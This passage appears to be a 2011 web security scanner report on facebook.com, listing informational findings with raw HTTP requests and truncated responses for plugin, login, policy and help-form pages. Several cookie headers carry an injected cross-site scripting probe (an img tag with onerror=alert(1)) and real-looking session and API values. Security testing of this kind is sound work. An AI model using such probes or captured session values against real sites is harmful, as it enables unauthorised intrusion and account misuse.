Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fmobile%2F%3Fref%3Dpf; act=1304613664644%2F2; next=http%3A%2F%2Fwww.facebook.com%2Fmobile%2F%3Fsettings; next_path=%2Fmobile%2F%3Fsettings

Response 2

14.4. http://www.facebook.com/plugins/activity.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.facebook.com
Path:	/plugins/activity.php

Request 1

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=5D0Du; reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Fpages%2FToP-SeCNeT%2F195242630519520; reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fpages%2FToP-SeCNeT%2F195242630519520; wd=1124x1058

Response 1

Request 2

GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&site=http%3A%2F%2Fwww.sportingnews.com&width=260 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=5D0Du; reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Fpages%2FToP-SeCNeT%2F195242630519520; reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fpages%2FToP-SeCNeT%2F195242630519520; wd=1124x1058

Response 2

14.5. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.facebook.com
Path:	/plugins/like.php

Request 1

GET /plugins/like.php?action=like&api_key=132151116822711&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df214d667b%26origin%3Dhttp%253A%252F%252Fwww.mmafighting.com%252Ff2ec84b17c%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fmmafighting.com%2F2011%2F05%2F04%2Fformer-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11%2F&layout=standard&locale=en_US&node_type=link&ref=article&sdk=joey&show_faces=false&width=300 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response 1

Request 2

GET /plugins/like.php?action=like&api_key=132151116822711&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df214d667b%26origin%3Dhttp%253A%252F%252Fwww.mmafighting.com%252Ff2ec84b17c%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fmmafighting.com%2F2011%2F05%2F04%2Fformer-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11%2F&layout=standard&locale=en_US&node_type=link&ref=article&sdk=joey&show_faces=false&width=300 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response 2

14.6. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Request 1

GET /plugins/likebox.php?api_key=117854138246106&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2b533dbd4%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1450dca4c%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&connections=10&header=false&height=180&href=http%3A%2F%2Fwww.facebook.com%2Fsportingnews&locale=en_US&sdk=joey&show_faces=true&stream=false&width=298 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response 1

Request 2

GET /plugins/likebox.php?api_key=117854138246106&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2b533dbd4%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1450dca4c%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&connections=10&header=false&height=180&href=http%3A%2F%2Fwww.facebook.com%2Fsportingnews&locale=en_US&sdk=joey&show_faces=true&stream=false&width=298 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response 2

14.7. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Request 1

GET /plugins/recommendations.php?site=techcrunch.com&width=290&height=330&header=false&colorscheme=light&font=verdana&border_color=white HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/?icid=navbar_techcrunch_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response 1

Request 2

GET /plugins/recommendations.php?site=techcrunch.com&width=290&height=330&header=false&colorscheme=light&font=verdana&border_color=white HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response 2

14.8. http://www.facebook.com/policy.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.facebook.com
Path:	/policy.php

Request 1

Response 1

Request 2

GET /policy.php HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; act=1304613620616%2F2; _e_nXwy_1=%5B%22nXwy%22%2C1304613620617%2C%22act%22%2C1304613620616%2C2%2C%22http%3A%2F%2Fwww.facebook.com%2Fpolicy.php%22%2C%22a%22%2C%22click%22%2C%22-%22%2C%22r%22%2C%22%2Fr.php%3Fprofile_id%3D100000824820783%26next%3Dhttp%253A%252F%252Fwww.facebook.com%252Fprofile.php%253Fid%253D100000824820783%22%2C%7B%22ft%22%3A%7B%7D%2C%22gt%22%3A%7B%7D%7D%2C657%2C204%2C12%2C981%2C16%5D

Response 2

14.9. https://www.facebook.com/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://www.facebook.com
Path:	/

Request 1

GET / HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.facebook.com/h02332
Cookie: datr=ei-eTSD3asNl9SJtmB_ThrM-; lsd=T19_s; reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Fh02332; reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fh02332

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.189.31
X-Cnection: close
Date: Thu, 05 May 2011 12:38:17 GMT
Content-Length: 31099

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<label class="uiButton uiButtonConfirm" for="u909775_3"><input value="Login" tabindex="4" type="submit" id="u909775_3" /></label></td></tr><tr><td class="login_form_label_field"><input type="checkbox" class="inputcheckbox" value="1" id="persistent" name="persistent" tabindex="3" /><input type="hidden" name="default_persistent" value="0" /><label id="label_persistent" for="persistent">Keep me logged in</label></td><td class="login_form_label_field"><a href="http://www.facebook.com/recover.php" rel="nofollow">Forgot your password?</a></td></tr></table><input type="hidden" name="charset_test" value="€,´,...,..,...,..,.." /><input type="hidden" id="lsd" name="lsd" value="T19_s" autocomplete="off" /></form>
</div></div></div></div><div id="dropmenu_container"></div><div id="content" class="fb_content clearfix"><div><div class="uiWashLayout"><div class="uiWashLayoutGradientWash"><div class="uiWashLayoutWashContent"><div class="contentContainer"><div class="clearfix fbIndexFeaturedRegistration"><div class="feature lfloat"><div class="plm fbIndexMap"><div class="plm title fsl fwb fcb">Facebook helps you connect and share with the people in your life.</div><div class="mtl map"></div></div></div><div class="signupForm rfloat"><div class="mbm phm headerTextContainer"><div class="mbs mainTitle fsl fwb fcb">Sign Up</div><div class="mbm subtitle fsm fwn fcg">It's free and always will be.</div></div><div id="registration_container"><div><noscript><div id="no_js_box"><h2>Javascript is disabled on your browser.</h2><p>Please enable JavaScript on your browser or upgrade to a Javascript-capable browser to register for Facebook.</p></div></noscript><div id="simple_registration_container" class="simple_registration_container"><div id="reg_box"><form method="post" id="reg" name="reg" onsubmit="return function(event){return false;}.call(this,event)!==false && Event.__inlineSubmit(this,event)"><input type="hidden" autocomplete="off" name="post_form_id" value=
...[SNIP]...

Request 2

GET / HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: datr=ei-eTSD3asNl9SJtmB_ThrM-; lsd=T19_s; reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Fh02332; reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fh02332

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.151.83
X-Cnection: close
Date: Thu, 05 May 2011 12:38:23 GMT
Content-Length: 31031

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<label class="uiButton uiButtonConfirm" for="u910363_3"><input value="Login" tabindex="4" type="submit" id="u910363_3" /></label></td></tr><tr><td class="login_form_label_field"><input type="checkbox" class="inputcheckbox" value="1" id="persistent" name="persistent" tabindex="3" /><input type="hidden" name="default_persistent" value="0" /><label id="label_persistent" for="persistent">Keep me logged in</label></td><td class="login_form_label_field"><a href="http://www.facebook.com/recover.php" rel="nofollow">Forgot your password?</a></td></tr></table><input type="hidden" name="charset_test" value="€,´,...,..,...,..,.." /><input type="hidden" id="lsd" name="lsd" value="T19_s" autocomplete="off" /></form>
</div></div></div></div><div id="dropmenu_container"></div><div id="content" class="fb_content clearfix"><div><div class="uiWashLayout"><div class="uiWashLayoutGradientWash"><div class="uiWashLayoutWashContent"><div class="contentContainer"><div class="clearfix fbIndexFeaturedRegistration"><div class="feature lfloat"><div class="plm fbIndexMap"><div class="plm title fsl fwb fcb">Facebook helps you connect and share with the people in your life.</div><div class="mtl map"></div></div></div><div class="signupForm rfloat"><div class="mbm phm headerTextContainer"><div class="mbs mainTitle fsl fwb fcb">Sign Up</div><div class="mbm subtitle fsm fwn fcg">It's free and always will be.</div></div><div id="registration_container"><div><noscript><div id="no_js_box"><h2>Javascript is disabled on your browser.</h2><p>Please enable JavaScript on your browser or upgrade to a Javascript-capable browser to register for Facebook.</p></div></noscript><div id="simple_registration_container" class="simple_registration_container"><div id="reg_box"><form method="post" id="reg" name="reg" onsubmit="return function(event){return false;}.call(this,event)!==false && Event.__inlineSubmit(this,event)"><input type="hidden" autocomplete="off" name="post_form_id" value=
...[SNIP]...

14.10. https://www.facebook.com/h02332 previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://www.facebook.com
Path:	/h02332

Request 1

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Fh02332; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fh02332; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.185.122
X-Cnection: close
Date: Thu, 05 May 2011 12:38:10 GMT
Content-Length: 40951

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...
<label class="uiButton uiButtonConfirm" for="u909025_1"><input value="Login" tabindex="4" type="submit" id="u909025_1" /></label></td></tr><tr><td class="login_form_label_field"><input type="checkbox" class="inputcheckbox" value="1" id="persistent" name="persistent" tabindex="3" /><input type="hidden" name="default_persistent" value="0" /><label id="label_persistent" for="persistent">Keep me logged in</label></td><td class="login_form_label_field"><a href="http://www.facebook.com/recover.php" rel="nofollow">Forgot your password?</a></td></tr></table><input type="hidden" id="next" name="next" value="https://www.facebook.com/h02332" autocomplete="off" /><input type="hidden" name="charset_test" value="€,´,...,..,...,..,.." /><input type="hidden" id="lsd" name="lsd" value="T19_s" autocomplete="off" /></form>
</div></div></div></div><div class="signup_bar_container"><div class="signup_box clearfix"><a class="signup_btn uiButton uiButtonSpecial uiButtonLarge" role="button" href="/r.php?locale=en_US"><span class="uiButtonText">Sign Up</span></a><span class="signup_box_content"><span>Facebook helps you connect and share with the people in your life.</span></span></div></div><div id="dropmenu_container"></div><div id="content" class="fb_content clearfix"><div id="mainContainer"><div id="leftColContainer"><div id="leftCol"><div id="pagelet_left_column"></div></div></div><div id="contentCol" class="clearfix hasRightCol"><div id="headerArea"><div id="pagelet_header"></div></div><div id="rightCol" role="complementary"><div id="pagelet_right_sidebar"></div></div><div id="contentArea" role="main"><div id="pagelet_main_column"></div></div><div id="bottomContent"></div></div></div></div><div id="pageFooter"><div id="contentCurve"></div><div class="clearfix" id="footerContainer"><div role="contentinfo" class="lfloat"><div class="fsm fwn fcg"><span title="HPHP - 26 - ZViC2TaHB3ILGz3ldJWObA - 169984"> Facebook .. 2011</span> .. <a rel="dialog" href="/ajax/intl/language_dialog.php?uri=https%3A%2F%2Fwww.facebook.com%2Fh023
...[SNIP]...

Request 2

POST /h02332 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: datr=ei-eTSD3asNl9SJtmB_ThrM-; lsd=T19_s
Content-Type: application/x-www-form-urlencoded
Content-Length: 779

post_form_id=76bac92d00ddc3f918cce3ae87a1177e&lsd=T19_s&captcha_persist_data=AQBeontrT_F0tu7Ahqufh0Nz_L57GC3z01jTVMayUpXS3RtmLp7gUAIWBcPgu66CfwG3bDSmtoZxxdfxY8Wj0BFJoRTL5R9qmmmGtfS7XvxLkrDktAk6_X9BzWt
...[SNIP]...

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Fh02332; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fh02332; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.28.38.108
X-Cnection: close
Date: Thu, 05 May 2011 12:38:53 GMT
Content-Length: 40883

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...
<label class="uiButton uiButtonConfirm" for="u913341_1"><input value="Login" tabindex="4" type="submit" id="u913341_1" /></label></td></tr><tr><td class="login_form_label_field"><input type="checkbox" class="inputcheckbox" value="1" id="persistent" name="persistent" tabindex="3" /><input type="hidden" name="default_persistent" value="0" /><label id="label_persistent" for="persistent">Keep me logged in</label></td><td class="login_form_label_field"><a href="http://www.facebook.com/recover.php" rel="nofollow">Forgot your password?</a></td></tr></table><input type="hidden" id="next" name="next" value="https://www.facebook.com/h02332" autocomplete="off" /><input type="hidden" name="charset_test" value="€,´,...,..,...,..,.." /><input type="hidden" id="lsd" name="lsd" value="T19_s" autocomplete="off" /></form>
</div></div></div></div><div class="signup_bar_container"><div class="signup_box clearfix"><a class="signup_btn uiButton uiButtonSpecial uiButtonLarge" role="button" href="/r.php?locale=en_US"><span class="uiButtonText">Sign Up</span></a><span class="signup_box_content"><span>Facebook helps you connect and share with the people in your life.</span></span></div></div><div id="dropmenu_container"></div><div id="content" class="fb_content clearfix"><div id="mainContainer"><div id="leftColContainer"><div id="leftCol"><div id="pagelet_left_column"></div></div></div><div id="contentCol" class="clearfix hasRightCol"><div id="headerArea"><div id="pagelet_header"></div></div><div id="rightCol" role="complementary"><div id="pagelet_right_sidebar"></div></div><div id="contentArea" role="main"><div id="pagelet_main_column"></div></div><div id="bottomContent"></div></div></div></div><div id="pageFooter"><div id="contentCurve"></div><div class="clearfix" id="footerContainer"><div role="contentinfo" class="lfloat"><div class="fsm fwn fcg"><span title="HPHP - 24 - UZYunW_t88lyAzr2UT6zrg - 187392"> Facebook .. 2011</span> .. <a rel="dialog" href="/ajax/intl/language_dialog.php?uri=https%3A%2F%2Fwww.facebook.com%2Fh023
...[SNIP]...

14.11. https://www.facebook.com/help/contact.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://www.facebook.com
Path:	/help/contact.php

Request 1

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fhelp%2Fcontact.php%3Fshow_form%3Dcannot_identify%26flow%3Dpw_reset; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.189.113
X-Cnection: close
Date: Thu, 05 May 2011 11:44:19 GMT
Content-Length: 23828

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<label class="uiButton uiButtonConfirm" for="u585927_3"><input value="Login" tabindex="4" type="submit" id="u585927_3" /></label></td></tr><tr><td class="login_form_label_field"><input type="checkbox" class="inputcheckbox" value="1" id="persistent" name="persistent" tabindex="3" /><input type="hidden" name="default_persistent" value="0" /><label id="label_persistent" for="persistent">Keep me logged in</label></td><td class="login_form_label_field"><a href="http://www.facebook.com/recover.php" rel="nofollow">Forgot your password?</a></td></tr></table><input type="hidden" id="next" name="next" value="https://www.facebook.com/help/contact.php?show_form=cannot_identify&flow=pw_reset" autocomplete="off" /><input type="hidden" name="charset_test" value="€,´,...,..,...,..,.." /><input type="hidden" id="lsd" name="lsd" value="zTWKd" autocomplete="off" /></form>
</div></div></div></div><div id="dropmenu_container"></div><div id="content" class="fb_content clearfix"><div class="UIFullPage_Container"><div class="mvl ptm uiInterstitial help_form uiInterstitialLarge uiBoxWhite"><div class="uiHeader uiHeaderBottomBorder mhl mts uiHeaderPage interstitialHeader"><div class="clearfix uiHeaderTop"><div class="uiHeaderActions rfloat"></div><div><h2 class="uiHeaderTitle">I Cannot Identify My Account</h2></div></div></div><div class="phl ptm uiInterstitialContent"><form method="post" action="https://www.facebook.com/help/contact.php?show_form=cannot_identify&cant_identify=0" id="helpform" onsubmit="return Event.__inlineSubmit(this,event)" enctype="multipart/form-data" class="cannot_identify"><input type="hidden" name="charset_test" value="€,´,...,..,...,..,.." /><input type="hidden" name="lsd" value="zTWKd" autocomplete="off" /><input type="hidden" id="redirect" name="redirect" value="http://www.facebook.com/help/?mail_sent" autocomplete="off" /><table id="dialog" border="0" cellspacing="0" width="510"><tbody><tr><td class="dialog"><div class="instructions">Please fill out this form if you are unable to
...[SNIP]...

Request 2

GET /help/contact.php?show_form=cannot_identify&flow=pw_reset HTTP/1.1
Host: www.facebook.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
